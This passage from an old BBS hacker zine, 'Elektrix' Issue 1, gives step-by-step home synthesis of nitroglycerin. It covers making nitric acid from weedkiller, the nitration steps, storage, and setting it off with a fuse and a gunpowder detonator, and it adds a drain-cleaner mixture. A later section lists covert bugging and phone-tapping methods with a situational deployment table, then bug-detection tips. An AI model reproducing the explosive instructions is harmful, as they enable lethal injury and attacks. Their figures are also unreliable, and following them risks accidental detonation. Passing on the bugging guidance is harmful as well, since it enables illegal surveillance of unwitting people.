  834.  Now getting the Nitric acid in any form is well difficult unless you have
  835.  access to it at college/work etc. The best way I've found is to take Sodium
  836.  Nitrate weedkiller and do the following:
  837.  
  838.  1) Purify the Sodium Nitrate from the weedkiller by making a saturated soln.
  839.     and then crystallizing it and washing the crystals and filter off any
  840.     nasties...Now you have Sodium Nitrate (reasonably pure).
  841.  
  842.  2) Then take the Sodium Nitrate crystals and crush them into a powder or as
  843.     close as you can get.
  844.  
  845.  3) Now you want to sort of extract the nitrate - for this you will need fair
  846.     distillation equipment. You are attempting to make Nitric Acid from the
  847.     Sodium Nitrate by reacting it with some of the Sulpluric acid which was
  848.     concentrated from before.
  849.  
  850.   i)    Pour Sulphuric acid in here
  851.             ||
  852.            |D2|___                D5 <- Nasty gases will be coming out of
  853.  Put the   |    _ \      ______   ||    here - Nitrogen Dioxide (toxic!!!)
  854.  Sodium    |   / \ \D3  |  ___ \  ||
  855.  Nitrate   |  |   \ \___| |  _| |_||_
  856.  crystals  |  |    \------| | | | || | <----- Clear container with Nitrogen
  857.  in here   /D1\   /\        |-| |----|        Dixode bubbling through the
  858.      ----> \__/   ||        |___D4___|        water to turn it to Nitric Acid
  859.            HEAT   ||
  860.   That is a cooling bracket (yeh I know it looks nothing like one but thats
  861.   life with TXT files!)...I hope that solves confusion over the following
  862.   instructions...Bet it doesn't! hah
  863.  
  864.   ii) Right assemble the distillation/fractional distillation equipment or
  865.       homemade equipment if that's what you've done as shown above.
  866.  
  867.  iii) Put the Sodium Nitrate crystals in the flat bottomed flask (D1) and
  868.       you may want to put some anti-bumping granules in too (tiny bits of
  869.       glass).
  870.  
  871.   iv) Don't connect D4 or D5 at this time - just a bowl to get any crap that
  872.       comes off early.
  873.  
  874.    v) Start pouring in the Sulphuric Acid(D2) and keep the mixture hot so the
  875.       reaction is real good. When it gets to around 79 degrees (I think) or
  876.       so then a red sort of mist comes about inside the equipment - don't
  877.       run like phuck away but be worried all the same since you have to move
  878.       fast now.....Connect D4 and D5 and make sure you don't breathe in any
  879.       of the red smoke (Nitrogen Dioxide) [If you wanna intoxicate yerself
  880.       then read my third Anarchists guide on....chemical weapons (dioxins)].
  881.       (It's probably best to make sure you don't breathe the crap in by add-
  882.       ing a second D4 thing on the end of D5 to filter off as much vapour as
  883.       possible).
  884.  
  885.   vi) Once that's all over then you will have a nice concentrated nitric acid
  886.       in D4.....
  887.  
  888.  [BTW - Remember to keep the cooling bracket D3 real cool with fresh cool run
  889.   ning water - or you won't get much at all].
  890.  
  891.  
  892.  NOTE: IT'S BEST TO STORE NITRIC ACID WHEN CONCENTRATED IN STEEL CONTAINERS
  893.  WHICH CAN RESIST THE CORROSIVE ACTION....USE GLOVES AT ALL TIMES...
  894.  
  895.  
  896.  4) Ok so now you have Sulphuric acid conc., Nitric acid conc. and glycerin.
  897.     Now for the difficult bit! (Haha You thought the worst was over)
  898.  
  899.  5) Right this is a *** VERY *** dangerous bit.........
  900.  
  901.   DON'T DO IT INDOORS...OR IN THE GARAGE - DO IT IN AN ISOLATED FIELD NEAR
  902.   YER HOUSE...IF YOU DON'T HAVE ONE THEN USE YER NEIGHBOURS GARDEN...
  903.  
  904.     Get a wooden tray or box and fill it with ICE....make sure there's always
  905.     ice to stack it up - it * MUST * remain cool. Then get a conical flask
  906.     (phuck a round-bottomed one)...and a thermometer measuring up to 100 C.
  907.  
  908.     Balance the flask carefully and securely in the ice bath and put the
  909.     thermometer in.
  910.  
  911.     Get the Sulphuric, Nitric and glycerin in the following proportions:
  912.  
  913.                 Glycerin : Conc.Nitric : Conc.Sulphuric
  914.                    3     :      1               1
  915.  
  916.     I recommend using 1/2 litre quantities of both acids for the first batch.
  917.  
  918.  
  919.  6) WARNING: You are using conc.acids - they do not like water - they will
  920.     blow you up if you mistreat them by feeding them water - Make sure all
  921.     parts inside the equipment are PHUCKING dry.
  922.  
  923.     Put the nitric acid into the flask and then * VERY * slowly pour in the
  924.     sulphuric acid whilst watching the temperature....(use a dropper).
  925.  
  926.     MAKE SURE: If the temperature ever goes about 30 degrees C then pour the
  927.     contents of the flask into the ice bath and run like ****** PHUCK ******
  928.  
  929.     As the temperature rises add the glycerin with a pipette (dropper) and
  930.     don't pour on any more until the temperature drops and is stable.
  931.  
  932.  
  933.  7) Repeat this until all the ingredients are gone......
  934.  
  935.  8) Take the jar (very carefully - it's never blown up on me - but there's
  936.     a first for everything!) with the mixture of acids in it and look at the
  937.     bottom - there will be a layer that isn't quite colourless.....This is
  938.     the stuff you want.    [^^^^^ At the bottom]
  939.  
  940.  9) Carefully take off the top acid layer with a dropper/pipette or whatever
  941.     and store it for later use.
  942.  
  943. 10) When you get near to the bottom layer (ie. Nitroglyerin) then carefully
  944.     pour on water to wash away the acids. Then let it settle again - repeat
  945.     this until you are satisfied that the acids are as gone as you can get
  946.     them - four or five times.
  947.  
  948. 11) Now collect the nitroglycerin in a dry jar or something and carry it back
  949.     to your fridge in the ice bath (***** VERY CAREFULLY *****).
  950.  
  951. 12) Now keep your nitroglycerin nice and cold (so it doesn't blow up your
  952.     house when you're watching TV or on your computer).
  953.  
  954.  
  955.   You can store Nitroglycerin in Kieselguhr (a type of clay) - then it's
  956.   easier to handle and store - add a fuse and you have dynamite.
  957.  
  958.  
  959.   You have now made nitroglycerin - now what to do with it?......
  960.  
  961.  
  962.   USE OF NITROGLYCERIN
  963.  
  964.  
  965.   Nitroglycerin is ofcourse a VERY high explosive. Not as high as good old
  966.   tri-nitro-toluene (TNT) but you'd find it real hard to make TNT - since
  967.   it most CERTAINLY can't be made with ordinary Sulphuric Acid.....you DO
  968.   need fuming sulphuric acid (a totally different substance).
  969.  
  970.   So what to do with it?
  971.  
  972.   Well if you want to blow it up you're unlikely to do it without using a
  973.   lighted fuse/detonator......it needs quite a kick to start itself off. You
  974.   can use gunpowder if you pack in into a tight space (see earlier) but the
  975.   best detonation cap I've come across is Mercury (ii) Fulminate - see Part3
  976.   of 'The Anarchists guide to...' for information on this and other kinds of
  977.   detonators. But saying that gunpowder still works well.....
  978.  
  979.   An idea (never tried it but worth a go):
  980.  
  981.   Try putting this lot in a jar with a fuse hanging out........
  982.  
  983.                   ____
  984.      ------------|  | | -------- Nitroglycerin (not to scale)
  985.  Fuse            |__|_|
  986.  (made with
  987.   fuse paper)     |
  988.                   |
  989.                   |
  990.  
  991.                   Gunpowder (used as detonation cap)
  992.  
  993.  
  994.   DO THIS IN A VERY ISOLATED PLACE.......LIKE AN ISLAND OR A FOREST....SINCE
  995.   THE EXPLOSION IS * VERY * LOUD AND * VERY * WIDESPREAD.
  996.  
  997.   *** YOU ONLY NEED A FEW DROPS TO MAKE A DECENT EXPLOSION!!!!!! ***
  998.  
  999.   If you want to know about more stuff to use your Nitroglycerin for then you
  1000.   can contact me on Palm Beach BBS +44(303)-265979 as Deceptor.
  1001.  
  1002.  
  1003.  
  1004.  HOT STUFF
  1005.  
  1006.   Don't really know what to call this other than 'HOT STUFF' - it gets bloody
  1007.  hot and it eats away at Aluminium in seconds (well almost! heh).
  1008.  
  1009.  1) Just go to the supermarket and buy some 'DRAINO' or stuff for unblocking
  1010.     drains.
  1011.  
  1012.  2) Make sure it's the powder one and take out all the bits of metal. Then
  1013.     mix the leftover powder with water to make a hot and steaming liquid.
  1014.  
  1015.   The mixture will then eat at aluminium, etc and really nicely - It doesn't
  1016.  like bicycles....they tend to disappear after a while.
  1017.  
  1018.  
  1019.  
  1020.  That's it for this Issue of Elektrix.....Stay in tune for Laser Weaponry....
  1021.  Detonators.....Rocket Launchers......Grenades......and more in the next!
  1022.  
  1023.  
  1024.           TO JOIN THE ANARCHISTS UNDERGROUND MAIL ME AT PALM BEACH
  1025.                ONLY COMPETENT ANARCHISTS NEED APPLY (DECEPTOR)
  1026.  
  1027.  
  1028.  -------------------- Palm Beach BBS ++44(303)-265979 -----------------------
  1029.  
  1030.  ----------------------------------------------------------------------------
  1031. |                                                                            |
  1032. |                    ELEKTRIX Issue 1 - Part 3                               |
  1033. |                    ~~~~~~~~~~~~~~~~~~~~~~~~~                               |
  1034. |                                                                            |
  1035. |         A discussion of Electronic Surveillance techniques                 |
  1036. |                        by The Technic                                      |
  1037. |                                                                            |
  1038. |                PALM BEACH BBS UK ++44(303)-265979                          |
  1039. |                                                                            |
  1040.  ----------------------------------------------------------------------------
  1041. Electronic Surviellance
  1042.  
  1043. Who'd bug me? I hear you ask what for, well just remember that with teh
  1044. introduction of EPSS in teh sattes and System X over here every call has a log
  1045. and that log contains who you called, where it was from and how long. In a rec
  1046. article in the Guardian it pointed out that BT and the police kept 40 people
  1047. "Under Surviellance" for 9 months before actaully arresting them for telephone
  1048. fraud. Still think no-one wants to bug you?, well later on there are some hand
  1049. tips to detect thses bugs but first you need to know what they are:
  1050.  
  1051.  
  1052. Body Mics.
  1053.  
  1054. These are just mics which are concealed on the body, then hooked up to a
  1055. transmitter or a recorder. These range from flat microphones taped to the skin
  1056. or tieclips, cufflinks, wrist watches whatever you need.
  1057.  
  1058. Condenser mics need their own power as they modify the power in accordance wit
  1059. the sound so results in thicker leads.
  1060.  
  1061. Range: Small and can pick up a lot of background noise
  1062.  
  1063. Conditions: Close contact, quiet - good for conversations etc.
  1064.  
  1065. Cost: Relatively cheap.
  1066.  
  1067.  
  1068. Contact Mics. Spikes. Tube Mics.
  1069.  
  1070. This allows the eavesdropper to listen in on someone in the next room, they
  1071. come in several types.
  1072.  
  1073.  
  1074. Contact Mics
  1075.  
  1076. These mics respond to vibrations in a sounding board like a door, and are
  1077. available as pickups for guitars etc. The sounding board can be a door, a
  1078. window, or a thin wall and only need to be pressed or glued to the board.
  1079. As the wall gets thicker it is harder ( if not impossible ) to use a contact
  1080. mic. this can be solved with ....
  1081.  
  1082. Spikes
  1083.  
  1084. A spike is a spike of hardened steel which is hammered into the wall and nearl
  1085. comeout at the other end - but not quite, then a microphone is mounted on the
  1086. spike which will pick up the vibrations from the next room.
  1087.  
  1088.  
  1089. Tube Mikes
  1090.  
  1091. These are simply microphones in a sealed box with a small plastic tube
  1092. protruding from it. Then connect the mic to an amplifier and then stick the
  1093. tube where u want (a keyhole) and then listen. You can drill a hole in the wal
  1094. or use the back to back sockets in hotels, if drilling make sure that no bits
  1095. plaster fall off - common method of detection.
  1096.  
  1097. Range: Next room or can be used with a transmitter
  1098.  
  1099. Conditions: Just needs to be close
  1100.  
  1101. Cost: The mics are cheap but the radio bugs and associated equipment can be
  1102. expensive
  1103.  
  1104.  
  1105. Small Directional Mics.
  1106.  
  1107. These are designed to be used at short distances and directional so they can
  1108. pick up a conversation. Can be mounted in a briefcase or in a pen etc. and mus
  1109. be aimed at the target - the briefcase one can be conected to a tape recorder.
  1110. Pen or sleeve types can be connected to a pocket recorder. A variation is a MI
  1111. mounted in a small bell shaped object and is held in the hand, then you walk i
  1112. front of the trget and they will not suspects anyone following from the front.
  1113.  
  1114. Range: Small and can pick up a lot of background noise
  1115.  
  1116. Conditions: Useless in a crowded street, or with something between target and
  1117.  
  1118. Cost: Relatively cheap.
  1119.  
  1120.  
  1121. Shotugn, Machine Gun, Rifle Mics.
  1122.  
  1123. These are long distance directional microphones, and often have handles and
  1124. can resemble guns ( be careful when aiming one of these at someone as they
  1125. might think it is a gun and you might not be wearing a bullet proof vest).
  1126. These are then hooked up to an amplifier or tape recorder, swing from left
  1127. to right and stop when sound is loudest. These can be difficult to conceal
  1128. and difficult to aim, also without a frequency analyser to level out sounds
  1129. any background noise can drown the conversation.
  1130.  
  1131. Range: can be several hundred feet       Conditions: calm weather and quiet
  1132.  
  1133. Cost: expensive with amp and accesories
  1134.  
  1135. Parabolic Mics.
  1136.  
  1137. These are very like rifle mikes, usually a large circular metal or plastic dis
  1138. which reflects sound to a microphone mounted in the centre of the dish. They
  1139. are not as sensitve as rifle mics. but are a lot cheaper, they are bulky thoug
  1140. and difficult to hide. You can hide a rifle mike under a long coat but not a
  1141. dish  unless your a woman who happens to be pregnant. Can use bird song
  1142. recording as a cover - with a bird book in your pocket etc. tweed jacket.
  1143. Condenser or Crystal mics best for long range devices, output is usually highe
  1144. than dynamic mics. These can be bought anywhere - cheap.
  1145.  
  1146. Range: can be several hundred feet       Conditions: calm weather and quiet
  1147.  
  1148. Cost: expensive with amp and accesories
  1149.  
  1150. Like rifle MIC.
  1151.  
  1152.  
  1153. Radio Bugs
  1154.  
  1155. This is a small transmitter with a microphone. The devices can be combined to
  1156. perform as a reciever and a microphone ( used in mind reading acts ). They are
  1157. broadly split into two types - those which power them selves and those which
  1158. draw power from some source. Bear inmind the size also has to include the
  1159. antenna which can be several inches long. There is a problem of signal drift
  1160. which can be overcome with a crystal control - but this requires more power.
  1161.  
  1162. If they are not diguised they can be a dead give away ( they reciver doesn`t
  1163. need to be disguised as the bugs can be tuned to operate on FM (VHF) or AM so
  1164. just listen in your radio or car radio), to get around this several novel
  1165. methods of disguise have been used.
  1166.  
  1167. Martini Olive Bug
  1168.  
  1169. This is designed to look like an olive on a cocktail stick, the transmitter
  1170. is the olive and the antenna the stick. Range about fifty feet and can functio
  1171. happily at the bottom of the glass.
  1172.  
  1173. Sugar-Cube Bug
  1174.  
  1175. This has two audio frequency circuits and three radio frequency circuits.
  1176. Sealed in a protective silicon shell designed to resemble a sugar cube. Can
  1177. transmit while at the bottom of a cup of coffee.
  1178.  
  1179. Pen Bug
  1180.  
  1181. Ball point or fountain pen and switched on by twisting the barrel or removing
  1182. the cap and placing on the other end and they write.
  1183.  
  1184. Calulator Bug
  1185.  
  1186. Transmitter is built into a popular calculator which will function normally
  1187. and can draw power from the calculator battery.
  1188.  
  1189. Plug Bug
  1190.  
  1191. Looks like a standard 13 amp plug but has a transmitter whihc has own battery
  1192. or can draw power from mains. Also can use earth wire as antenna.
  1193.  
  1194. Adaptor Bug.
  1195.  
  1196. Works like an ordinary plug but transmitter built in , can use mains power.
  1197.  
  1198. Light Switch Bug
  1199.  
  1200. Built into the back of a rocker type light switch and draws power from mains
  1201. supply - two models available - one which is on all the time and one which
  1202. transmits only when the light is on.
  1203.  
  1204. A problem with all these bugs is the limited battery life, there are several
  1205. methods of extending battery life. Vox activated - these have a preset level
  1206. at which they will switch on and a delay when they stop (so they dont stop whi
  1207. there is a gap in a sentance) but because of the switch the bug is bigger.
  1208. Another method is to incorporate a timer circuit and this will turn the bug
  1209. on and off when set ( digital watch technology) can be set 9-5 when people are
  1210. in offices. A more expensive way is to use a radio controlled bug, a coded
  1211. signal is sent to activate the bug and then it switches off after two minutes.
  1212. Very expensive though.
  1213.  
  1214. HOMERS
  1215.  
  1216. These are radio transmitters used to track someone, it is simply a transmitter
  1217. which sends high powered pulses and a reciever picks them up as a series of
  1218. beeps, the transmitter is usually the size of a cigarette packet and has a sho
  1219. rigid aerial sticking out and a couple of powerful magnets to hold it onto the
  1220. car. The receivers depend on what you can afford, simplest is one with no
  1221. direction capabitlity and relies on volume - the closer you get the louder it
  1222. gets. Then there are those which indicate direction , this can be a vertically
  1223. mounted loop aerial or a pair of aerials on on each side of the vehicle. When
  1224. you pick up the sound turn until it is loudest then you are in the same plane
  1225. as the homer then you can gauge how far away by the speed of the beeps ( the
  1226. faster the closer) this plane can be behind you as well as in front though.
  1227. Some extra features are range control - you switch as you get closer e.g
  1228. 1st settings beeps until a continuous tone then within 6 miles, then 2nd setti
  1229. this goes into a continuous tone within one mile etc. Another feature can be t
  1230. null switch , if the target is directly in front or behind you there is no sou
  1231. if the target moves left or right you will get a tone ( different for left and
  1232. right).  Doppler shift recievers will tell you in which direction the target i
  1233. moving but its expensive.
  1234.  
  1235. Homing people can be done by incorporating the homer into a card ( business or
  1236. credit, make sure its think or coloured so the electronics can`t be seen) but
  1237. you canot have a battery so it relies on the radiation given out by Tv sets an
  1238. radio`s and other electrical appliances and converts them into a series of bee
  1239. They are only suitable for close work.
  1240.  
  1241. Laser Bug
  1242.  
  1243. This is rather like a contact mike as it relies on the vibrations produced by
  1244. sound on the window, it reflects light waves and when they hit the window they
  1245. will be modulated slightly. Feed a pulsed power supply to a laser and direct t
  1246. beam at the window and some of this light will be reflected back, use a good
  1247. astronomical telescope to focus the light and then it passes through a pinhole
  1248. and onto a photomultiplier tube. The tube and its electronics detects variatio
  1249. in pulse width and translates them back into sound. Infra red can be used, but
  1250. you will have to use an ordinary light source to target it. Another way is to
  1251. use cd lasers to pick up conversations and transmit them to a receiver miles
  1252. away but you will have to line it up VERY accurately. It is also hard to detec
  1253. or stumble across accidently.
  1254.  
  1255. Infra Red Transmitter
  1256. This can transmit up to 500 metres and is similar to a radio bug, the bug
  1257. must be by a window though and a special reciever is needed ( maybe in a camer
  1258.  
  1259.  
  1260. Telephone Tapping
  1261.  
  1262. Tapping telephones can be done several ways and each relies on different
  1263. equipment.
  1264.  
  1265. Inductive Tap
  1266.  
  1267. Induction microphones are very cheap and be bought anywhere , they are a
  1268. couple of inches long and about half an inch across (cylindrical), it has two
  1269. wires coming out of one end and a sucker on teh other end. The wiring can go t
  1270. a tape recorded or an amplifier, obviu\ously this can`t be used but there are
  1271. mics which are disguised as pads or other desk objects, in most cases a minatu
  1272. amplifier is needed. Another type fits over the phone line and alos houses a
  1273. transmitter also it doesn`t cut into the cable although the sound is weak.
  1274. Alos note that they can be detected if a radio transmitter is built in and the
  1275. can pick up humming from electrical devices.
  1276.  
  1277. Radio Tap
  1278.  
  1279. These are transmitting bugs specifically designed for use with phones. The mos
  1280. common device in the ...
  1281.  
  1282. Drop in Mike
  1283.  
  1284. This is so called as in america the microphone just had to be unscrewed and th
  1285. new transmitter dropped in. It draws its power from the phone and needs no
  1286. maintenance. It acts like a normal microphone and transmits all conversations.
  1287.  
  1288. Series an Parallel
  1289.  
  1290. The obvious difference between these is the way in which theuy are connected t
  1291. the phone line, the parallel is connected over both lines whereas the series
  1292. is connected over one, they can both incorporate a small transmitter.
  1293.  The Parallel bug can be line or battery powered, but you can get the best of
  1294. both worlds by having them trickle charged - it draws minute quantities and is
  1295. difficult to detect via a meter. Battery powered versions are said to have a
  1296. better range and they operate all the time so could lead to detection. No
  1297. wires have to be cut to install this bug.
  1298.  The series bug is more common and cheaper, it can be batery or line powered b
  1299. will only transmit when the phone is in use - this makes detection difficult.
  1300. The line powered versions are smaller , about an inch square and half an inch
  1301. think - hiding it in a phone or junction box is easy.
  1302.  
  1303. Third Wire Bug
  1304.  
  1305. These bugs are connected in paralleland normally line powered although a
  1306. rechargable battery version is available. Average size is around 1 and half
  1307. inches by half an inch, it operates like a prallel bug but when not in use
  1308. switches to its own internal microphone and transmits souns from the room,
  1309. this is reputedly favourite amongst USA law enforcement agencies.
  1310.  
  1311. Infinity Transmitter
  1312.  
  1313. These are around the size of a third wire bug and are the most exotic type of
  1314. bug. They cannot monitor telephone conversations but the device is line
  1315. powered and can be connected anywhere along the phone line ( or inside the
  1316. phone) the person calls the target and then sends a tone down the line which
  1317. activates the Bug. The tone is matched to a reciving unit in the bug and thus
  1318. they are also known as Harmonica bugs. The bug cancels the bell of the
  1319. victim's phone and uses an internal mic or the phones mic to send the room
  1320. conversation down the line - note that these cannot be used wher ther is a
  1321. switchboard due to the direct dialling technique. There are several variaitons
  1322. of this bug - One device waits for the eavesdropper to dail and then expects a
  1323. tone immediately this cancels the bell so it doesn't even ring. However the
  1324. bell could ring and alert the victim. Another device waits for the victim to
  1325. answer and then says he has a wrong number, when the victim hangs up the
  1326. device is activated. Another device automatically cuts out the handset if the
  1327. phone is lifted so operates normally, some cut off after a certain amount of
  1328. time, some incorporate an led so that installation is easy as the light will b
  1329. on if installed correctly. They don't need batteries or further attention
  1330. once installed. They are very difficult to detect and even the phone company
  1331. can miss it if its off.
  1332.  
  1333. Hookswitch Defeat
  1334.  
  1335. This is the switch the handset is dropped onto, by defeating this the micropho
  1336. will still be activated and you can listen in. The defeat can be done by a
  1337. resistor connected across the switch - an amplifier would be needed on the
  1338. listeners side as the volume level will be low. The method is to call up say
  1339. that you have a wrong number and then don't hang up when he does, then listen
  1340. Although this can work for anyone else too so some are remote controlled. (ton
  1341. or radio activated). They are hard to detect and cheap, ( can`t detect as its
  1342. only one component).
  1343.  
  1344. Drop Out Relay
  1345.  
  1346. These are widely available and are just electronic switches which switch on
  1347. whenever the phone is in use. Some have their own batteries or line powered
  1348. and can activate taperecorders etc. by the raly - just clip on and put the
  1349. other lead in the tape recorder. They are easy to install and can be used
  1350. legitimately.
  1351.  
  1352. Lost Transmitters
  1353.  
  1354. This is a bug which is designed to blend in with the electrical components
  1355. - they are wired into the circuit board and transmit whenever it is in use
  1356. and will pick up sounds from the room. These are very expensive if one is foun
  1357.  this means you are dealing with some very nasty people.
  1358.  
  1359. Direct Tap
  1360.  
  1361. All you need is a pair of high impedence head phones and connected to the line
  1362. via crocodile clips with a capacitor in between to keep out the phone companie
  1363. electricity. There are many disadvantages as it is very easy to spot and when
  1364. installing and produce clicking noises on the line. A higher voltage will pass
  1365. through the lines or terminals and this can be detected by a meter or bulb, th
  1366. headphones can be replaced by a tranformer and then to a tape recorder.
  1367. Excellent Quality.
  1368.  
  1369. Ok so there are the bugs now how the F**K do you find them!
  1370.  
  1371.  
  1372. BUGGING - Guidelines
  1373.  
  1374. Stick to these if possible, use own judgement in special situations.
  1375.  
  1376. Situation               Device Used               Remarks
  1377.  
  1378. Rural                   Rifle,MIC.                Bulky, difficult to conceal,
  1379. Location                Parabolic mic.            need little background noise
  1380.                                                   and good weather.
  1381.  
  1382. Urban                   Small Directional         Difficult to operate in
  1383. Location                MIC.                      crowded streets. Background
  1384.                                                   noise a problem.
  1385.  
  1386. Vehicle                 Radio bug, Am- FM         Power a problem unless
  1387.                         VHF,                      connected to car power.
  1388.                                                   Can pick up interference fro
  1389.                                                   vehicle electrics, effecienc
  1390.                                                   will fluctuate as receiver
  1391.                                                   will have to follow close
  1392.                                                   behind.
  1393.  
  1394.                         Tape Recorder             Normally lots of space in ca
  1395.                                                   ( dash, under seat ), but ne
  1396.                                                   change tapes. Quality and
  1397.                                                   reliability excellent.
  1398.  
  1399. Restaurants etc.        Concealed directional     Easy to use, good quality,
  1400.                         Mike.                     Get close to target. Table b
  1401.                                                   wall - less background noise
  1402.                                                   use less against noisy room.
  1403.  
  1404. Offices/Rooms           Tape Recorder             Difficult to conceal and nee
  1405. with access.                                      regular access - excellent
  1406.                                                   quality.
  1407.  
  1408.                         Wired Mic.                Range limited to length of w
  1409.                                                   can be time consuming to
  1410.                                                   install - may lead to detect
  1411.                                                   no further attention after
  1412.                                                   installation. Quality very
  1413.                                                   good.
  1414.  
  1415.                         Radio Bug                 Battery type have a limited
  1416.                                                   life but more flexible in
  1417.                                                   installation. 100 yard range
  1418.                                                   quality can be very poor.
  1419.                                                   use VOX ( voice activate) to
  1420.                                                   reduce detection.
  1421.  
  1422.                         Hookswitch Defeat         Open telephone MIC. room
  1423.                                                   conservation carried down li
  1424.                                                   Resistor, capacitor or diode
  1425.                                                   can be used.Can be missed by
  1426.                                                   physical search. Works Well.
  1427.  
  1428. Office/Room
  1429. Without access         Contact Mic.               Easy and quick, install on
  1430.                                                   window, door, or wall. Good
  1431.                                                   results depends on thickness
  1432.                                                   of wall ( sounding board ).
  1433.                                                   Difficult to detect.
  1434.  
  1435.                        Tube Mic.                  Can be pushed through cracks
  1436.                                                   wall, through keyholes, unde
  1437.                                                   doors, in back to back socke
  1438.                                                   installation canbe noisy
  1439.                                                   (drill holes), work well.
  1440.                                                   Very difficult to detect.
  1441.  
  1442.                        Spike Mic.                 Noisy and difficult to insta
  1443.                                                   but can work well. Difficult
  1444.                                                   detect. But can be detected
  1445.                                                   metal detector.
  1446.  
  1447.                        Infinity Transmitter       Fitted easily along phone li
  1448.                                                   carries conversation anywher
  1449.                                                   works, good quality and hard
  1450.                                                   to detect.
  1451.  
  1452.                        Laser Bug                  Safest way, but expensive.
  1453.  
  1454.  
  1455. Telephone Tapping
  1456.  
  1457. Type                     Remarks
  1458.  
  1459.  
  1460. Direct Tap               Simple to install, especially at terminal box,
  1461.                          Headphones can be used, or drop out relay and recorde
  1462.                          Very good quality.
  1463.  
  1464. Inductive Tap            No connections needed, easy to install but has to be
  1465.                          close to phone, needs wiring to transmitter - can be
  1466.                          easy to detect. Quality is poor.
  1467.  
  1468. Series or Parallel       Can be connected anywhere along the line or concealed
  1469. Tap                      in phone or junction box. Transmits phone conversatio
  1470.                          to receiver, poor quality ( as in radio bug) but can
  1471.                          power from line or battery.
  1472.  
  1473. Third Wire Bug           As above but transmits romm conversation when phone n
  1474.                          in use.
  1475.  
  1476. Lost transmitter         Made to blend in with background of electronics
  1477.                          components - expensive, dificult to fit but equally
  1478.                          difficult to detect.
  1479.  
  1480. Drop in Bug              Simple to install and some difficult to detect by
  1481.                          physical search. Needs no attention and is reliable.
  1482.  
  1483.  
  1484. Detecting
  1485.  
  1486. 1. Physical search - start outside the house and walk slowly around it and
  1487.                      examine eveything carefully, look for any wires going int
  1488.    Outside House     the walls and make sure you know what they are for and
  1489.                      follow them back to the pole etc. look for wires spliced
  1490.                      into the cable, particularly in the top of the pole. Ther
  1491.                      may be an inspection hatch if the cables go under ground
  1492.                      so try and lift and inspect it. If in a large building
  1493.                      look in the terminal box for any wires across terminals i
  1494.                      anything suspicious is found then call the company. While
  1495.                      walking outside examine the windows ( frames as well) loo
  1496.                      for signs of disturbance.
  1497.  
  1498.    Inside House      Examine ALL furniture, check backs and drawers, wardrobes
  1499.                      etc. Look under beds - under the fabric underneath, look
  1500.                      for holes, bedrooms are favourite. Standard bugs have a w
  1501.                      trailing from them, and a battery on the outside. Don`t
  1502.                      forget all the disguised bugs and any household ornaments
  1503.                      remnove green felt or feel underneath for holes.Ask where
  1504.                      all objects came from, look at all pictures and frames ma
  1505.                      sure they haven`t been tampered with . Examine walls,
  1506.                      ceilings and floors, also curtains and pelmets, roll back
  1507.                      carpets and examine floorboards. Anything suspicious then
  1508.                      take up the floor boards and have a look. Look for any
  1509.                      suspicious wires tucked under the edges of carpets. Alway
  1510.                      examine ceilings from above if possible, especially in
  1511.                      bedrooms, wear overalls. If only from below have a look
  1512.                      at flaking paint in walls and ceiling and look for mis-
  1513.                      matched areas of paint. Examine any holes but check for
  1514.                      electrical wires etc. first. Houses and apartments with
  1515.                      party walls have problems, the best way to see these is t
  1516.                      check for flaking paint or small holes. Don`t go round to
  1517.                      neighbours whenn found - they aren`t going to let you in
  1518.                      they have bugged you. You can dig away at the wall and kn
  1519.                      the spike out. Holes for tube mikes can be blocked up wit
  1520.                      plaster filler effectively knocking it out. Switch off th
  1521.                      mains and look at light sockets ( unscrew ), and look for
  1522.                      any extra components. With the power unscrew the ceiling
  1523.                      roses and take a look inside, also any other light
  1524.                      fittings.
  1525.  
  1526.    The telephone     Pickup the handset and unscrew, examine the telephone
  1527.                      thoroughly, small bkack cubes with wires are trouble, che
  1528.                      the hookswitch action, make sure it shuts off the mic,
  1529.                      examine all wires thoroughly and see where they go, check
  1530.                      to see if any are thinnner or thicker and if they use pro
  1531.                      terminals or not. Put phone back together and check junct
  1532.                      box, look at terminals and check telegraph pole and the
  1533.                      junction box at the top.
  1534.  
  1535. 2. Electrical        First use metal detector,check walls, celings, floors any
  1536.                      pipes will run in a straight line , helpful to know where
  1537.                      the pipes etc. run Check any ornaments with the detector
  1538.                      shake ornaments and check weight, look at base for holes
  1539.                      covered with filler.
  1540.  
  1541.                      If no equipment use VHF radio and turn control to see if
  1542.                      any screech happens, put next to phone if screech then th
  1543.                      line bug, make a call and test again , check junction box
  1544.                      same way, Use tv with indoor aerial, make a loud noise an
  1545.                      turn tv down and tune tv - if a bug then horizontal lines
  1546.                      appear which wil jump to the music - nearer the bug large
  1547.                      the jump, - this will pick up the bug ( if VHF) from a
  1548.                      distance away , send the sound source to several adjoinin
  1549.                      rooms to detect bugs further away. If found carry on onto
  1550.                      rest of bandwidth,  get someone to make a call and check
  1551.                      again. examine terminal box - voltage between terminals
  1552.                      should be 46-50v if lower may be a bug in parallel, infin
  1553.                      drop till under 10, lift handset measure voltage 2-12v. i
  1554.                      higher then something connected in series (series bug).
  1555.                      Open phone and check microphone terminals - hold down hoo
  1556.                      switch and if voltage across mic then hookswitch defeat e
  1557.                      Check volts across terminal while sending tones down line
  1558.                      Examine car, underneath for homers, look at woring for
  1559.                      splicing and under dash, feedback search,
  1560.  
  1561.  Deterrence          Paint a thin stripe of nail varnish across gaps, tighten
  1562.                      screws then undo by a quarter or 3/4 then make a note of
  1563.                      where the slots and the screws are. Apply to junction box
  1564.                      too. Check all people coming in and restrict entry - watc
  1565.                      at all times. If to toilet go to bedroom and find summit
  1566.                      do. If bug found hold a bait meeting to lure eaves droppe
  1567.                      If not return to bug and drain bettery so has to replace.
  1568.                      if bug reconnect wire several times while making a call,
  1569.                      series jiggle the hookswitch and then cut off bug.
  1570.  
  1571.   Training           Use labur force, Carbon ribbons just dumped in bin wherea
  1572.                      documents shredded. Short hand pads left in drawer docume
  1573.                      locked away. People wander around freely - ask who - if
  1574.                      be careful of security etc. car phone a big risk and
  1575.                      portable or freeway wireless ones. use phones far away fr
  1576.                      hotels etc. use different tables at restaurants etc. lase
  1577.                      bug prevent heavy curtains blinds etc. and clean windows
  1578.                      ( dirty ones reflect more) - itemised phone bills, cellul
  1579.                      radio - big brother - easy to detect, satellite,
  1580.  
  1581.  
  1582.  
  1583. Detecting Bugs
  1584.  
  1585. This can be quite cheap and easy.
  1586.  
  1587. Field Strength Meter
  1588.  
  1589. This is bascially a crystal radio set connected to a meter instead of a speake
  1590. It shows the power output of any transmitter in the vicinity and is sold as an
  1591. aid to ham radio operators. The sensitivity is low so detection should not be
  1592. further than 12 inches away from the bug. If it does detect something the need
  1593. will swing across so the furthest swing will be closest to the meter. A proble
  1594. can be that they will react to a passing polics car or a commercial radio
